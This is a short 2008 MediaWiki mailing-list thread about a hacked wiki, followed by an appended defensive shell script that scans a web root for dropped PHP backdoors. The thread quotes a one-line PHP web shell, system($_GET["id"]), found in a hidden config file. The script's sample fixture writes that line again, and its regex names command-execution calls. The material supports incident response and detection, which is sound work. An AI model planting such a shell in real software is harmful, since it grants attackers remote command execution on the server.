Someone uploaded that to his undeleted config directory, possibly
using a hole somewhere else on the server. Note the . name to make it
invisible.

Itay, I'm afraid you should look for other things on the server...
once this was in, they basically had shell access via the web user. I
wouldn't be surprised if you found some nasty surprises in other
writable directories. For example, when we got broken into, we found
lots of stuff hiding in the MW image directories.

grep -r casino .

gave us lots of clues. My condolences.

JH
On Mar 14, 2008, at 11:52 AM, Brion Vibber wrote:
Itay Ophir wrote:
| We managed to find and hopefully resolve this security hole.
|
| It was not the index.php.
|
| It was the /config/.info.php. In that file there is the following
| line:
|
| <?php system($_GET["id"]) ?>
MediaWiki does not contain or produce any such file.
-- brion vibber (brion @ wikimedia.org)
=====================================
Jim Hu
Associate Professor
Dept. of Biochemistry and Biophysics
2128 TAMU
Texas A&M Univ.
College Station, TX 77843-2128
979-862-4054
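
As an added example that is not part of the original thread: a shell triage script for the clean-up described above, which looks for dot-named PHP files, PHP in upload directories, and files that pass request input to a command call like the quoted /config/.info.php. The function names, the regex and the upload directory names (`images`, `upload`) are assumptions to adjust for the install being checked.

```sh
#!/bin/sh
# Added example (not from the thread): triage a web root for dropped PHP files.
# The patterns and the upload directory names below are assumptions to tune.

# ERE: a PHP command-execution/eval call taking request input directly,
# which is the shape of the one-line /config/.info.php quoted in the thread.
EXEC_ON_INPUT='(system|exec|passthru|shell_exec|popen|proc_open|eval)[[:space:]]*\([^)]*\$_(GET|POST|REQUEST|COOKIE)'

# Prefix each path read from stdin with a reason label and a tab.
tag() { while IFS= read -r f; do printf '%s\t%s\n' "$1" "$f"; done; }

# scan_webroot DIR: print "<reason><TAB><path>" findings, sorted.
scan_webroot() {
    {
        # 1. Dot-prefixed PHP files, which a plain `ls` does not list.
        find "$1" -type f -name '.*' \( -name '*.php' -o -name '*.phtml' \) | tag hidden-php
        # 2. PHP under upload directories, which should hold only media.
        find "$1" -type f \( -path '*/images/*' -o -path '*/upload/*' \) \
            \( -name '*.php' -o -name '*.phtml' \) | tag php-in-upload-dir
        # 3. PHP files that hand request parameters to a command or eval call.
        find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) \
            -exec grep -lE -e "$EXEC_ON_INPUT" {} + | tag exec-on-request-input
    } | LC_ALL=C sort
}

# build_sample DIR: constructed tree (one backdoor, one stray upload, one benign file).
build_sample() {
    mkdir -p "$1/config" "$1/images/a/ab" "$1/includes"
    printf '%s\n' '<?php system($_GET["id"]) ?>' > "$1/config/.info.php"
    printf '%s\n' '<?php echo "x"; ?>' > "$1/images/a/ab/thumb.php"
    printf '%s\n' '<?php echo htmlspecialchars($_GET["title"]); ?>' > "$1/includes/Title.php"
}

# Stand-alone run: scan the directory given as $1, else a constructed sample tree.
if [ "$#" -gt 0 ]; then
    scan_webroot "$1"
else
    tmp=$(mktemp -d) && build_sample "$tmp" && scan_webroot "$tmp"
    rm -rf "$tmp"
fi
```

A hit under reason 3 is a lead to read by hand, not proof of compromise, and a clean result does not rule out obfuscated code.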